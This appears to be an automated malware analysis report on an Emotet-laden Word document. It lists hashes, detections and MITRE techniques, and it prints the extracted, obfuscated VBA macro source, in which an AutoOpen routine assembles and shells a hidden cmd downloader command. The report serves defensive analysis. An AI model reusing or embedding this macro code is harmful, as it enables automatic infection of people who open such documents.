Emotet Office (OLE) malware analysis — malicious · 77fb2eaf3bfede88

MALICIOUS

Office (OLE)

98.6 KB Created: 2018-07-30 22:49:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 3a7da59e453f1a8683923b169fe3d199 SHA-1: c70d2763fb92e24bfae923df333c83341ed651ce SHA-256: 77fb2eaf3bfede8885ddf9235d841784e666780036b95fc0fa5d218189b01bb4

142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883982-0', indicating a downloader functionality. The presence of an AutoOpen VBA macro (T1059.005) further supports this, as it is designed to execute automatically upon opening. The macro attempts to construct and execute a command-line string, likely to download and run a secondary payload, which is a common Emotet behavior.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6883982-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6883982-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5851 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5851 bytes
SHA-256: `e351cbd83397a43ca95c35893a0e29c3f1dd21a898ebc004e43d5f50b0f992ce`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QCvuGUdwlFPLm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next AppActivate Sgn(91488 - IEpln) AppActivate 24 AppActivate Fix(439 + DWcif + 80768 / Jmzmw) AppActivate Rnd(520806294) AppActivate CInt(ouizv) Shell@ CVar("cm") + nPivMna + NLMSEwQXhqZwEV + zjNZs + pKmYpqGaCSm + KETiJC + itKuwOUv + zXXEwPwajRiB + BVZuHzJjuTzK, 901588224 - 901588224 AppActivate Sin(WwSBhi) AppActivate CLng(SjbcWV) AppActivate ChrB(34) End Sub Attribute VB_Name = "uKGtJaACfZOd" Function zjNZs() On Error Resume Next AppActivate 3 AppActivate PkpNtZ AppActivate 1954 cmqVrmsKDBT = "d /V:O/C" + CStr(Chr(imDiVtZbmdMU + cMHwvlCj + 34 + wVoRNuR + mjiBVYwbtHw)) + "set 0p=tZ" + "RQTdrhT" + "JQdsZr" + "fLNadi" + "Rt" + "opiBQn9E4" + ".Y);-x F" + "emlu{$1A" AppActivate 184968001 AppActivate Chr(224) AppActivate 380373930 kzNsWi = "W+k\" + "jCD" + "5,'y:P=U" + "wvc@S}b" + "(" + "g/" + "&&for %h " + "in (24" + ",23,63,40" + ",14,12,7" + "," + "40,42,42,3" AppActivate Int(kJSVtf) AppActivate 814 AppActivate CLng(AjuEK + wHqdIU) wzSPnzZF = "8" + ",45,14,69," + "12,61,2" + "8,40,6" + "3,36," + "23,69,52" AppActivate CDbl(955) AppActivate ChrB(938) nvHHSUPYU = ",40,65,2" + "2,38,17,4" + "0,22,32" + ",48" + ",40" + ",69,53,42" + ",25,40,2" + "8" + "," + "22,35,4" AppActivate 6158 AppActivate Int(QbjKkD) iXcbiP = "5,24,9" + ",33" + ",61,57," + "7,22,22,2" + "4,59,72" + ",72,65," AppActivate CBool(311) AppActivate Round(29566 / zmkIl) uOsXYWENi = "42,40,18,1" + "4,69" + ",4" + "2," + "43,40," + "36,71,14," zjNZs = cmqVrmsKDBT + kzNsWi + wzSPnzZF + nvHHSUPYU + iXcbiP + uOsXYWENi AppActivate CLng(AKHns) AppActivate CBool(7569) End Function Function pKmYpqGaCSm() On Error Resume Next AppActivate Oct(Xpvqr / rjitr + 46061 * iVjib) AppActivate CNEQG jrLVuqURu = "23,43,24,3" + "2,65,23,41" + ",72,29" + ",66,7,2" + "2,22,24," + "59,72,72," + "25,18,65,2" AppActivate phiWp AppActivate Chr(ZWsiA - CBUhjV - NXRol + IbZuA) AppActivate Hex(9) ktwLKq = "3,69,40,42" + ",42,25,32," + "65,42,72,4" + "1" + ",62," + "52" + ",52,42,66" + ",7" + ",2" + "2" + ",22,24,59" + ",72,72,50" AppActivate 9682 AppActivate Log(359157909) wznlY = "," + "14" + ",2" + "5,12,22,25" + ",18,28," + "4" + "1," AppActivate 9 AppActivate 254518935 AppActivate phOML whAQmpitsjF = "18," + "14,4" + "2,23,63,32" + ",65," + "23,41" + ",72," + "22," + "66,7,22,2" + "2,24,59,72" + ",72,41," + "40,19,2" + "5,18,1" AppActivate StqvHp AppActivate 198710423 AppActivate 231936111 jIbVhDGcWB = "4," + "25,22,41,3" + "2" + ",6" + "5,23,41" + ",32,43" + ",18" + ",72" AppActivate uUXzs AppActivate 80 AppActivate ZPFNf sYjWBOSwLj = ",19,19," + "46,16,47" + ",18,58" + ",66,7,22" + ",22," + "24," + "59," + "72,72," + "41,14,50" + ",7,18,42" + "," + "40,19,28," + "18,12," AppActivate Hex(uLipv + UjLcwu) AppActivate qMYqZU AppActivate 9299 TSSHG = "14,32,6" + "5,23,41" + ",72,24," + "71,57,32,6" + "7,24,42" + ",25,22" + ",70,57," + "66" + ",57," + "34,35,45,2" + "2,27," + "63,38" + ",61,3" pKmYpqGaCSm = jrLVuqURu + ktwLKq + wznlY + whAQmpitsjF + jIbVhDGcWB + sYjWBOSwLj + TSSHG AppActivate Int(38486 - fdFsE) AppActivate CInt(92127 * votBpD) AppActivate 9077 End Function Function KETiJC() On Error Resume Next AppActivate Log(4) AppActivate 497544360 LzUEBmU = "8,57,31," + "46,55,57,3" + "5,45,69,43" + ",30,61,45," + "40,28," AppActivate fjQOAH AppActivate zkuOTP GZtUc = "64,59" + ",22,4" + "0,41,24,4" + "9,57," + "51,57" + ",49,45,22" AppActivate GODwDz AppActivate Sqr(azzpdE / 12560 - 83880 + oKtii) AppActivate Hex(KimAjz) joKOujXj = ",2" + "7,63,49,57" + ",3" + "2" + ",40,37," + "40" + ",57" + ",35,15," + "23,14,40," + "1" AppActivate 3 AppActivate Round(2) AppActiva ... (truncated)

SHA-256: e351cbd83397a43ca95c35893a0e29c3f1dd21a898ebc004e43d5f50b0f992ce

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QCvuGUdwlFPLm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate Sgn(91488 - IEpln)
   AppActivate 24
   AppActivate Fix(439 + DWcif + 80768 / Jmzmw)
   AppActivate Rnd(520806294)
   AppActivate CInt(ouizv)
Shell@ CVar("cm") + nPivMna + NLMSEwQXhqZwEV + zjNZs + pKmYpqGaCSm + KETiJC + itKuwOUv + zXXEwPwajRiB + BVZuHzJjuTzK, 901588224 - 901588224
   AppActivate Sin(WwSBhi)
   AppActivate CLng(SjbcWV)
   AppActivate ChrB(34)
End Sub


Attribute VB_Name = "uKGtJaACfZOd"
Function zjNZs()
On Error Resume Next
AppActivate 3
   AppActivate PkpNtZ
   AppActivate 1954
cmqVrmsKDBT = "d /V:O/C" + CStr(Chr(imDiVtZbmdMU + cMHwvlCj + 34 + wVoRNuR + mjiBVYwbtHw)) + "set 0p=tZ" + "RQTdrhT" + "JQdsZr" + "fLNadi" + "Rt" + "opiBQn9E4" + ".Y);-x F" + "emlu{$1A"
AppActivate 184968001
   AppActivate Chr(224)
   AppActivate 380373930
kzNsWi = "W+k\" + "jCD" + "5,'y:P=U" + "wvc@S}b" + "(" + "g/" + "&&for %h " + "in (24" + ",23,63,40" + ",14,12,7" + "," + "40,42,42,3"
AppActivate Int(kJSVtf)
   AppActivate 814
   AppActivate CLng(AjuEK + wHqdIU)
wzSPnzZF = "8" + ",45,14,69," + "12,61,2" + "8,40,6" + "3,36," + "23,69,52"
AppActivate CDbl(955)
   AppActivate ChrB(938)
nvHHSUPYU = ",40,65,2" + "2,38,17,4" + "0,22,32" + ",48" + ",40" + ",69,53,42" + ",25,40,2" + "8" + "," + "22,35,4"
AppActivate 6158
   AppActivate Int(QbjKkD)
iXcbiP = "5,24,9" + ",33" + ",61,57," + "7,22,22,2" + "4,59,72" + ",72,65,"
AppActivate CBool(311)
   AppActivate Round(29566 / zmkIl)
uOsXYWENi = "42,40,18,1" + "4,69" + ",4" + "2," + "43,40," + "36,71,14,"
zjNZs = cmqVrmsKDBT + kzNsWi + wzSPnzZF + nvHHSUPYU + iXcbiP + uOsXYWENi
   AppActivate CLng(AKHns)
   AppActivate CBool(7569)
End Function
Function pKmYpqGaCSm()
On Error Resume Next
AppActivate Oct(Xpvqr / rjitr + 46061 * iVjib)
   AppActivate CNEQG
jrLVuqURu = "23,43,24,3" + "2,65,23,41" + ",72,29" + ",66,7,2" + "2,22,24," + "59,72,72," + "25,18,65,2"
AppActivate phiWp
   AppActivate Chr(ZWsiA - CBUhjV - NXRol + IbZuA)
   AppActivate Hex(9)
ktwLKq = "3,69,40,42" + ",42,25,32," + "65,42,72,4" + "1" + ",62," + "52" + ",52,42,66" + ",7" + ",2" + "2" + ",22,24,59" + ",72,72,50"
AppActivate 9682
   AppActivate Log(359157909)
wznlY = "," + "14" + ",2" + "5,12,22,25" + ",18,28," + "4" + "1,"
AppActivate 9
   AppActivate 254518935
   AppActivate phOML
whAQmpitsjF = "18," + "14,4" + "2,23,63,32" + ",65," + "23,41" + ",72," + "22," + "66,7,22,2" + "2,24,59,72" + ",72,41," + "40,19,2" + "5,18,1"
AppActivate StqvHp
   AppActivate 198710423
   AppActivate 231936111
jIbVhDGcWB = "4," + "25,22,41,3" + "2" + ",6" + "5,23,41" + ",32,43" + ",18" + ",72"
AppActivate uUXzs
   AppActivate 80
   AppActivate ZPFNf
sYjWBOSwLj = ",19,19," + "46,16,47" + ",18,58" + ",66,7,22" + ",22," + "24," + "59," + "72,72," + "41,14,50" + ",7,18,42" + "," + "40,19,28," + "18,12,"
AppActivate Hex(uLipv + UjLcwu)
   AppActivate qMYqZU
   AppActivate 9299
TSSHG = "14,32,6" + "5,23,41" + ",72,24," + "71,57,32,6" + "7,24,42" + ",25,22" + ",70,57," + "66" + ",57," + "34,35,45,2" + "2,27," + "63,38" + ",61,3"
pKmYpqGaCSm = jrLVuqURu + ktwLKq + wznlY + whAQmpitsjF + jIbVhDGcWB + sYjWBOSwLj + TSSHG
   AppActivate Int(38486 - fdFsE)
   AppActivate CInt(92127 * votBpD)
   AppActivate 9077
End Function
Function KETiJC()
On Error Resume Next
AppActivate Log(4)
   AppActivate 497544360
LzUEBmU = "8,57,31," + "46,55,57,3" + "5,45,69,43" + ",30,61,45," + "40,28,"
AppActivate fjQOAH
   AppActivate zkuOTP
GZtUc = "64,59" + ",22,4" + "0,41,24,4" + "9,57," + "51,57" + ",49,45,22"
AppActivate GODwDz
   AppActivate Sqr(azzpdE / 12560 - 83880 + oKtii)
   AppActivate Hex(KimAjz)
joKOujXj = ",2" + "7,63,49,57" + ",3" + "2" + ",40,37," + "40" + ",57" + ",35,15," + "23,14,40," + "1"
AppActivate 3
   AppActivate Round(2)
   AppActiva
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.